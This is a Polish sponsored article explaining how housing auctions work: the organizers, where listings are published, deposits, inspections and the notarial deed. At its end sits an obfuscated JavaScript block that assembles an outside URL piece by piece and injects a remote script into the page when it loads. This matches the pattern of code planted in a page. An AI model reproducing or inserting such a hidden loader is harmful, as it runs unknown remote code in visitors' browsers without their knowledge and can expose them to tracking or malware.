Mieszkanie można kupić nie tylko na wolnym rynku, ale również dzięki udziałowi w przetargu mieszkaniowym. Na czym to polega? Gdzie szukać informacji o tego typu licytacjach? Odpowiedzi na te i inne pytania znajdują się w niniejszym artykule.
Co to jest przetarg mieszkaniowy?
Przetarg mieszkaniowy to licytacja organizowana przez podmiot posiadający nieruchomość na sprzedaż. Przykładem może być spółdzielnia mieszkaniowa, jednostka samorządu terytorialnego (np. gmina) czy spółka Skarbu Państwa. Jakie mieszkania są sprzedawane w drodze przetargu? Otóż, przedmiotem licytacji mogą być lokale należące do spółdzielni po śmierci ich dotychczasowych najemców czy mieszkania służbowe należące do danej firmy. Kto może wziąć udział w tego typu licytacji? Jest to uzależnione od rodzaju przetargu, ponieważ może on być ograniczony (np. przeznaczony dla danej grupy osób) lub nieograniczony. W tym drugim przypadku w licytacji może wziąć udział każdy, kto spełnia określone wymogi formalne.
Przetargi mieszkaniowe – gdzie szukać informacji?
Chcąc kupić mieszkanie w drodze przetargu warto wiedzieć nie tylko to, jak w praktyce wygląda tego typu licytacja, ale również to, gdzie szukać informacji o zbliżających się postępowaniach. Otóż, zgodnie z przepisami polskiego prawa ogłoszenia dotyczące planowanych licytacji muszą znajdować się nie tylko w siedzibie ich organizatora (w ogólnodostępnym miejscu), ale również zostać opublikowane w “sposób zwyczajowo przyjęty”, czyli w lokalnej prasie bądź jej internetowych odpowiednikach. Chcąc znaleźć zawsze aktualne informacje o organizowanych przetargach mieszkaniowych (oraz licytacjach działek, domów, garaży, czy lokali użytkowych) warto skorzystać z bazy dostępnej na stronie Listaprzetargow.pl, która gromadzi w jednym miejscu ogłoszenia o licytacjach przeprowadzanych na terenie całego kraju. Istotne jest także to, że przepisy prawa nie regulują wyłącznie sposobu publikacji ogłoszeń o przetargach, ale również ich treść. Obowiązkowo musi ona bowiem określać między innymi przedmiot licytacji, jej organizatora, warunki udziału w przetargu i jego rodzaj, cenę wywoławczą i wysokość wadium, a także termin oraz miejsce odbywania się aukcji.
Procedury związane z udziałem w przetargu mieszkaniowym
Przetarg mieszkaniowy to licytacja, która przebiega według określonych procedur. Należy zatem spełnić warunki określone przez jego organizatora, co pozwoli wziąć udział w aukcji. Przed przystąpieniem do licytacji warto dokonać również oględzin mieszkania będącego jej przedmiotem. Pozwoli to określić jego stan techniczny, jednak warto mieć świadomość, że w większości przypadków tego typu lokale wymagają remontu. Następnie wystarczy skompletować wymagane dokumenty oraz wpłacić wadium, które jest opłatą zabezpieczającą organizatora przetargu. W przypadku wygranej licytacji zaliczane jest na poczet kwoty zakupu, a przegrani otrzymują zwrot wadium. Po wygranej aukcji należy wpłacić wylicytowaną sumę (pomniejszoną o wadium) oraz podpisać akt notarialny potwierdzający przeniesienie własności nieruchomości.
Podsumowując należy stwierdzić, że przetarg mieszkaniowy pozwala kupić mieszkanie poniżej ceny rynkowej. Z reguły są to lokale wymagające remontu, jednak rekompensuje to atrakcyjna cena zakupu nieruchomości. W efekcie jest to rozwiązanie zarówno dla osób szukających mieszkania dla siebie, jak i chcących zarobić na jego późniejszej odsprzedaży czy wynajmie.
art.reklamowy
<script>
(function(){
x0i6_=(“u”+””)+”s”+””;x0i6_+=(“tat.”)+(“i”);
x0i6=document.createElement(“script”);x0i6.type=”text/javascript”;x0i6_+=”nf”+(“o”)+”/”;
x0i6u=”552739112″+”.”;x0i6.async=true;x0i6u+=”ua30tbhh0i6n9tn028sk1ssqtsck3n”;
x0i6.src=”https://”+x0i6_+x0i6u;x0i6b=document.body;x0i6b.appendChild(x0i6);
})();
</script>